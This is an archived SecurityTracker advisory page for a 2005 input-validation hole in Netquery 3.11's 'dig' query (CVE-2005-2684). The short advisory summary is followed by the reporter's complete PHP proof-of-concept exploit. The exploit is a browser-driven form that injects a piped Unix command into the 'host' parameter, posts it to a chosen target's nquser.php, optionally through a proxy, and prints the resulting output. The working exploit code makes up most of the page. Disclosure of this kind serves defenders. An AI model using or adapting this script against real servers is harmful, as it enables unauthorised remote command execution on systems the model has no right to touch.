SecurityTracker.com Archives - Netquery Input Validation Hole in 'dig' Query Lets Remote Users Execute Arbitrary Code

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

SecurityTracker
Archives

Sign Up

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Affiliates

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Partners

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (Generic) > Netquery

Vendors: Virtual Edge

Netquery Input Validation Hole in 'dig' Query Lets Remote Users Execute Arbitrary Code

SecurityTracker Alert ID: 1014750

SecurityTracker URL: http://securitytracker.com/id?1014750

CVE Reference: CVE-2005-2684 (Links to External Site)

Updated: Jun 8 2008

Original Entry Date: Aug 22 2005

Impact: Execution of arbitrary code via network, User access via network

Exploit Included: Yes

Version(s): 3.11

Description: rgod reported a vulnerability in Netquery. A remote user can execute arbitrary commands on the target system.

The 'host' parameter of the 'dig' query type is not properly validated. If 'register_globals' is set to 'on', then a remote user can supply a specially crafted 'dig' query to execute arbitrary commands on the target system.

Impact: A remote user can execute arbitrary commands on the target system with the privileges of the target web server.

Solution: No solution was available at the time of this entry.

Vendor URL: www.virtech.org/tools/index.html (Links to External Site)

Cause: Input validation error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: "retrogod@aliceposta.it" <retrogod@aliceposta.it>

Message History: None.

Source Message Contents

Date: Sun, 21 Aug 2005 20:54:03 +0200 (ora legale Europa occidentale)
From: "retrogod@aliceposta.it" <retrogod@aliceposta.it>
Subject: NETQUERY 3.11 remote commands execution poc exploit (previous version unproperly patched...)

 
<?php
 
/* 20.10 21/08/2005
NETQUERY 3.11 remote commands execution
by rgod
http://rgod.altervista.org
 
a lot of code for a pipe vulnerability...
run it from your browser...
make these changes in php.ini if you have troubles
with this script
 
allow_call_time_pass_reference = on
register_globals = On
 
netquery 3.1 was unproperly patched, now it's dig query to be vulnerable
try to launch |ls -la to list directories or this exlpoit form Apache to see if
you installation is vulnerable
                                                                             */
 
 
error_reporting(0);
echo '<head><title>Netquery 3.11 remote commands execution poc exploit by rgod</title>

      <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

      <style type="text/css">
      <!--
      body,td,th {color: #1CB081;}
      body {background-color: #000000;
             SCROLLBAR-ARROW-COLOR: #ffffff;  SCROLLBAR-BASE-COLOR: black;
      CURSOR: crosshair;
      }
      input {background-color: #303030 !important}
      input {color: #1CB081 !important}
      .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }
      .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;
        font-weight: bold;
        font-style: italic;
              }
      -->
      </style></head>
      <body>
 <p class="Stile6">20.10 21/08/2005</p>
<p class="Stile6">Netquery 3.11 remote commands execution poc exploit by rgod</p>

<p class="Stile6">tested on standalone edition, download it at <a href="http:
//www.virtech.org/tools/" target="_blank">http://www.virtech.org/tools/</a><
/p>
<p class="Stile6">a script by rgod at <a href="http://rgod.altervista.org"
 target="_blank">http://rgod.altervista.org</a></p>
<table width="84%" >
  <tr>
    <td width="43%">
     <form name="form1" method="post" action="'.$SERVER[PHP_SELF].'?path=
value&host=value&port=value&command=value&proxy=value">
      <p>
       <input type="text" name="host">
      <span class="Stile5">hostname (ex: www.sitename.com) </span></p>
      <p>
        <input type="text" name="path">
        <span class="Stile5">path (ex: /netquery/ or just /) </span></p>
      <p>
      <input type="text" name="port">
        <span class="Stile5">specify a port other than 80 (default value) </span><
/p>
      <p>
      <input type="text" name="proxy">
        <span class="Stile5">send exploit through an HTTP proxy (ip:port)  </span><
/p>
      <p>
      <input type="text" name="command">
        <span class="Stile5">a Unix command... </span></p>
      <p>
          <input type="submit" name="Submit" value="go!">
      </p>
    </form></td>
  </tr>
</table>
</body>
</html>';
 
function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
             $ji=0;
             $ci++;
             echo "<td>&nbsp;&nbsp;</td>";
             for ($li=0; $li<=15; $li++)
                      { echo "<td>".$headeri[$li+$ki]."</td>";
       }
            $ki=$ki+16;
            echo "</tr><tr>";
            }
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
                      { echo "<td>&nbsp&nbsp</td>";
                       }
 
for ($li=$ci*16; $li<=strlen($headeri); $li++)
                      { echo "<td>".$headeri[$li]."</td>";
       }
 
echo "</tr></table>";
}
 
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
 
if (($path<>'') and ($host<>''))
{
if ($port=='') {$port=80;}
 
$data="querytype=dig&host=%7C+".urlencode($command)."&digparam=ANY&x=8&
y=16";
 
if ($proxy=='')
       {$packet="POST ".$path."nquser.php HTTP/1.1\r\n";}
else
       {
        $c = preg_match_all($proxy_regex,$proxy,$is_proxy);
        if ($c==0) {
                    echo 'check the proxy...<br>';
             die;
            }
         else
        {$packet="POST http://".$host.$path."nquser.php HTTP/1.1\r\n";}
        }
       
$packet.="Accept: */*\r\n";
$packet.="Referer: http://".$host.$path."nquser.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Keep-Alive\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
 
echo '<br> Sending exploit to '.$host.'<br>';
 
if ($proxy=='')
           {$fp=fsockopen(gethostbyname($host),$port);}
           else
           {$parts=explode(':',$proxy);
     echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
     $fp=fsockopen($parts[0],$parts[1]);
     if (!$fp) { echo 'No response from proxy...';
   die;
         }
 
     }
show($packet);
fputs($fp,$packet); 
 
if ($proxy=='')
{    $data='';
     while (!feof($fp))
     {
      $data.=fgets($fp);
     }
}
else
{
$data='';
   while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data)))
   {
      $data.=fread($fp,1);
   }
 
}
fclose($fp);
if (eregi('HTTP/1.1 200 OK',$data))
    {echo 'Exploit sent...<br> If NetQuery 3.11 is unpatched and vulnerable <br>';
     echo 'you will see '.htmlentities($command).' output inside HTML...<br><br>';
    }
else
    {echo 'Error, see output...';}
 
//show($data); //debug: show output in a packet dump...
echo nl2br(htmlentities($data));
 
}
?>
		
_____________________________________________________________________
 FREE Emoticons for your email! Click Here!

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us | Help
Copyright 2007, SecurityGlobal.net LLC